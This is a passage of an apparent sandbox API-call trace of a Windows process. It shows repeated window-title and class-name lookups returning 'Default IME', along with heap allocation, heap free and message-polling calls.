out: lpString="Default IME") returned 11 [0119.906] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.907] GetWindowTextW (in: hWnd=0x10376, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.907] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.907] GetWindowTextW (in: hWnd=0x10374, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.907] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.907] GetWindowTextW (in: hWnd=0x10372, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.907] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.907] GetWindowTextW (in: hWnd=0x10370, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.908] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.908] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.908] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.908] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.908] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.908] GetWindowTextW (in: hWnd=0x10368, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.908] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.909] GetWindowTextW (in: hWnd=0x10362, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.909] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.909] GetWindowTextW (in: hWnd=0x10360, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.909] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.909] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.909] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.909] GetWindowTextW (in: hWnd=0x10358, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.910] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.910] GetWindowTextW (in: hWnd=0x10356, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.911] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.911] GetWindowTextW (in: hWnd=0x10354, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.911] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.911] GetWindowTextW (in: hWnd=0x10352, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.911] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.911] GetWindowTextW (in: hWnd=0x10350, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.911] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.912] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.912] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.912] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.912] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.912] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.912] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.912] GetWindowTextW (in: hWnd=0x10348, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.913] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.913] GetWindowTextW (in: hWnd=0x10346, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.913] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.913] GetWindowTextW (in: hWnd=0x20216, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.913] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.913] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.913] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.914] GetWindowTextW (in: hWnd=0x10334, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.914] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.914] GetWindowTextW (in: hWnd=0x10326, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.914] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.914] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.914] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.914] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.915] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.915] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.915] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.915] GetWindowTextW (in: hWnd=0x10312, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.915] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.915] GetWindowTextW (in: hWnd=0x20208, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.915] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.916] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.916] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.916] GetWindowTextW (in: hWnd=0x10278, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.916] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.916] GetWindowTextW (in: hWnd=0x10276, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.916] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.916] GetWindowTextW (in: hWnd=0x10274, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.916] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.917] GetWindowTextW (in: hWnd=0x20202, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.917] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.917] GetWindowTextW (in: hWnd=0x10272, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.917] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.917] GetWindowTextW (in: hWnd=0x10270, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.917] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.917] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.917] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.917] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.918] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.918] GetWindowTextW (in: hWnd=0x10250, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.918] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.918] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.918] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.918] GetWindowTextW (in: hWnd=0x10248, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.918] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.918] GetWindowTextW (in: hWnd=0x10246, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.919] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.919] GetWindowTextW (in: hWnd=0x10238, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.919] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.919] GetWindowTextW (in: hWnd=0x10228, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.919] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.920] GetWindowTextW (in: hWnd=0x10220, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.920] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.920] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.920] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.920] GetWindowTextW (in: hWnd=0x10212, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.920] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.920] GetWindowTextW (in: hWnd=0x10210, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.920] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.921] GetWindowTextW (in: hWnd=0x40194, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.921] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.921] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.921] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.921] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.921] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.921] GetWindowTextW (in: hWnd=0x10190, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.921] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.921] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0119.922] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0119.922] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.922] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.922] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.922] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.922] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.922] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.922] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.922] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.922] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.923] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.923] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.923] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.923] GetWindowTextW (in: hWnd=0x10076, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.923] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.923] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff028 | out: hHeap=0x12c0000) returned 1 [0119.924] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff230 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff230 | out: hHeap=0x12c0000) returned 1 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.924] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e98 | out: hHeap=0x12c0000) returned 1 [0119.924] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0119.924] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.924] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0119.924] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.924] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0119.925] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0119.925] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0119.925] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0119.925] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.925] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0119.925] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0119.926] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0119.926] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0119.926] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0119.926] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0119.926] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0119.928] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0119.928] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0119.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0119.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 